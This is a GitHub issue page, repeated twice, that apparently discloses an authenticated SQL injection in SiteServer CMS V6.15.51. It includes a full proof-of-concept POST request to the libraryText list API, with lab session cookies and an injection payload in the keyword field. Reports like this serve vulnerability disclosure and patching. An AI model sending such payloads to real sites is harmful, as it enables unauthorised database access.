We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
测试的版本:https://github.com/siteserver/cms/releases/download/siteserver-v6.15.51/siteserver_install.zip SiteServer: V6.15.51 测试环境:windows 2012 R2 数据库 sql server 2016 漏洞url:/api/pages/cms/libraryText/list (需要登录测试)
包体 `POST /api/pages/cms/libraryText/list HTTP/1.1 Host: 192.168.39.3:8055 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: application/json, text/plain, / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 Content-Length: 87 Origin: http://192.168.39.3:8055 Connection: close Referer: http://192.168.39.3:8055/SiteServer/cms/libraryText.cshtml?siteId=1 Cookie: BAIRONG.VC.ADMINLOGIN=oeLExOp9UBM0equals0; ss_administrator_access_token=M3ENIa3NKJJ39JCRHnY4PgfJqMC7lFjggL0e9S06Bs9ubZE90add0xM2aesaL0add0Cxo8Xe5VZrSanerzFU8oZaMXCC9KMxdw29fLk6uNSSoY4Pa0add0BOZfzRwKT2t3LglumO4sTUKSz0slash0ubJ9QajCyTsKpmbPu7yv20add08zpsQyVPpl3TuMITkOCIX1EwcC7CeIJ50slash0XQ9d0slash0oR8ECV0add0690add0eXRHbEImnZsLBsrhv7KML0Jhuevbhvcjs0equals0; ASP.NET_SessionId=l3tothqgmzbgljaogh1uof3y; SS-ADMIN-TOKEN=z69iWbk6QAgWtUmPiJBXDd7vXmikE7IMRbVWfh0add00xyMUHXn13zDSbfJyodBLcAQuP9kU0slash0F7SybZwZUK7ER9csWj0ODr7NgSqXfVWABfJpKMXGuT2wQudsXkhDU9JMvsrkNIPV5cKDS0UUwsItxWt94dwYeCgnKabl82uiN53cZg92iNHdF5LlWO0add0JnX0add0Vqb0XIViYPb4l3CUTpPq0add0bKGxRk56DSZLeLh9qV0jIhotDI0equals00secret0; SS-LOGIN-CAPTCHA=pyXvigbttyM0equals00secret0 Cache-Control: max-age=0
{"siteId":1,"keyword":"' and 1=(select @@Version)--","groupId":0,"page":1,"perPage":24}`
The text was updated successfully, but these errors were encountered:
No branches or pull requests
测试的版本:https://github.com/siteserver/cms/releases/download/siteserver-v6.15.51/siteserver_install.zip
SiteServer: V6.15.51
测试环境:windows 2012 R2
数据库 sql server 2016
漏洞url:/api/pages/cms/libraryText/list
(需要登录测试)
包体
`POST /api/pages/cms/libraryText/list HTTP/1.1
Host: 192.168.39.3:8055
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 87
Origin: http://192.168.39.3:8055
Connection: close
Referer: http://192.168.39.3:8055/SiteServer/cms/libraryText.cshtml?siteId=1
Cookie: BAIRONG.VC.ADMINLOGIN=oeLExOp9UBM0equals0; ss_administrator_access_token=M3ENIa3NKJJ39JCRHnY4PgfJqMC7lFjggL0e9S06Bs9ubZE90add0xM2aesaL0add0Cxo8Xe5VZrSanerzFU8oZaMXCC9KMxdw29fLk6uNSSoY4Pa0add0BOZfzRwKT2t3LglumO4sTUKSz0slash0ubJ9QajCyTsKpmbPu7yv20add08zpsQyVPpl3TuMITkOCIX1EwcC7CeIJ50slash0XQ9d0slash0oR8ECV0add0690add0eXRHbEImnZsLBsrhv7KML0Jhuevbhvcjs0equals0; ASP.NET_SessionId=l3tothqgmzbgljaogh1uof3y; SS-ADMIN-TOKEN=z69iWbk6QAgWtUmPiJBXDd7vXmikE7IMRbVWfh0add00xyMUHXn13zDSbfJyodBLcAQuP9kU0slash0F7SybZwZUK7ER9csWj0ODr7NgSqXfVWABfJpKMXGuT2wQudsXkhDU9JMvsrkNIPV5cKDS0UUwsItxWt94dwYeCgnKabl82uiN53cZg92iNHdF5LlWO0add0JnX0add0Vqb0XIViYPb4l3CUTpPq0add0bKGxRk56DSZLeLh9qV0jIhotDI0equals00secret0; SS-LOGIN-CAPTCHA=pyXvigbttyM0equals00secret0
Cache-Control: max-age=0
{"siteId":1,"keyword":"' and 1=(select @@Version)--","groupId":0,"page":1,"perPage":24}`
The text was updated successfully, but these errors were encountered: